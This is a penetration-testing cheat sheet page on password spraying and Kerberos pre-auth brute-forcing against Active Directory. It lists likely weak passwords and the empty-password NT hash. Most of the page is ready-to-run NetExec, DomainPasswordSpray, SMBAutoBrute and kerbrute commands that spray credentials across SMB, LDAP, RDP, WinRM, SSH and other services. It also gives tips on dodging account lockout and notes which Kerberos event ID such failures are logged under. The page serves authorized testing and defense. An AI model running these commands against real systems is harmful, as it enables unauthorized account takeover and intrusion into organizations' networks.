pwd-spraying.md (4373B)
1 --- 2 title: "Password - Spraying" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/pwd-spraying.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-spraying.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Password - Spraying 12 13 Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 14 15 > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. 16 17 Most of the time the best passwords to spray are : 18 19 - Passwords: `P@ssw0rd01`, `Password123`, `Password1`, 20 - Common password: `Welcome1`/`Welcome01`, `Hello123`, `mimikatz` 21 - $Companyname1:`$Microsoft1` 22 - SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!` 23 - Default AD password with simple mutations such as number-1, special character iteration (`*`,`?`,`!`,`#`) 24 - Empty Password: NT hash is `31d6cfe0d16ae931b73c59d7e0c089c0` 25 26 :warning: be careful with the account lockout ! 27 28 ## Spray a pre-generated passwords list 29 30 - Using [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) 31 32 ```powershell 33 nxc smb 10.0.0.1 -u /path/to/users.txt -p Password123 34 nxc smb 10.0.0.1 -u Administrator -p /path/to/passwords.txt 35 36 nxc smb targets.txt -u Administrator -p Password123 -d domain.local 37 nxc ldap targets.txt -u Administrator -p Password123 -d domain.local 38 nxc rdp targets.txt -u Administrator -p Password123 -d domain.local 39 nxc winrm targets.txt -u Administrator -p Password123 -d domain.local 40 nxc mssql targets.txt -u Administrator -p Password123 -d domain.local 41 nxc wmi targets.txt -u Administrator -p Password123 -d domain.local 42 43 nxc ssh targets.txt -u Administrator -p Password123 44 nxc vnc targets.txt -u Administrator -p Password123 45 nxc ftp targets.txt -u Administrator -p Password123 46 nxc nfs targets.txt -u Administrator -p Password123 47 ``` 48 49 - Using [hashcat/maskprocessor](https://github.com/hashcat/maskprocessor) to generate passwords following a specific rule 50 51 ```powershell 52 nxc smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` 53 ``` 54 55 - Using [dafthack/DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) to spray a password against all users of a domain. 56 57 ```powershell 58 Invoke-DomainPasswordSpray -Password Summer2021! 59 Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt 60 ``` 61 62 - Using [shellntel-acct/scripts/SMBAutoBrute](https://github.com/shellntel-acct/scripts/blob/master/Invoke-SMBAutoBrute.ps1). 63 64 ```powershell 65 Invoke-SMBAutoBrute -PasswordList "jennifer, yankees" -LockoutThreshold 3 66 Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose 67 ``` 68 69 ## BadPwdCount attribute 70 71 > The number of times the user tried to log on to the account using an incorrect password. A value of `0` indicates that the value is unknown. 72 73 ```powershell 74 $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users 75 LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never> 76 LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never> 77 ``` 78 79 ## Kerberos pre-auth bruteforcing 80 81 Using [ropnop/kerbrute](https://github.com/ropnop/kerbrute), a tool to perform Kerberos pre-auth bruteforcing. 82 83 > Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**. 84 85 - Username bruteforce 86 87 ```powershell 88 ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt 89 ``` 90 91 - Password bruteforce 92 93 ```powershell 94 ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username 95 ``` 96 97 - Password spray 98 99 ```powershell 100 ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 101 ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt 102 ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log 103 ```